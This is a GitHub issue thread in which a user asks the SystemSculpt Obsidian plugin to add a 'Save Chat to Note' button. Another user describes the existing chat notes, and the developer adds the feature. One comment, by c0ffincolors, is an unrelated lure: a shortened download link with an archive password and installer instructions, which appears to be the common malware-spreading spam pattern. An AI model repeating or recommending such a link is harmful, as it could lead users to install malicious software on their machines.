### ISSUE TITLE
Add A Button In Chat Actions To "Save Chat To Note"

### ISSUE THREAD

**Issue by grayerbeard** [SystemSculpt/obsidian-systemsculpt-ai#56]
## Describe the enhancement
I suggest adding a button next to "Archive Chat" called "Save Chat as Note". What I end up doing now is either copy pasting from a chat into a note or Clicking that Archive Chat button then laboriously going through the result to remove lotas of "`````" to turn the archived chat into a note.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ChrisBBBB** [comment]
@grayerbeard it already creates a new note the moment the AI gives the first response. A link to it is in the top left of the chat panel and it's stored in default location SystemSculpt/Chats. 
![image](https://github.com/user-attachments/assets/452223a8-7c2a-43af-9874-374a34767ff1)

You can click on that link directly to open it; you can change its title and edit the chat note, etc. and still when you carry on AI-chatting the next content is just added to the end of the note. It doesn't matter if you have the note open or not when you are chatting.

I think all 'archive note' does is move that note to one level folder down (ie to SystemSculpt/Chats/Archive).

You still have a great point of the code markers `````. I also often edit them out so that the markdown formatting appears properly, and I know of at least one other AI plugin where this is an option in its settings (whether it adds the code block markers or not), maybe the developer could consider that as an enhancement?

**Comment by SystemSculpt** [comment]
Hi @grayerbeard, thanks for your suggestion! I've added the "Save Chat to Note" button as you proposed. And you're right, @ChrisBBBB - that is one way to save it, but I just added a new way that makes it look much nicer. This issue is now resolved and closed. Let me know if you need any further assistance :) It will be active starting from update 0.7.0, which will release later today

**Comment by grayerbeard** [comment]
Thanks I will be using that a lot.
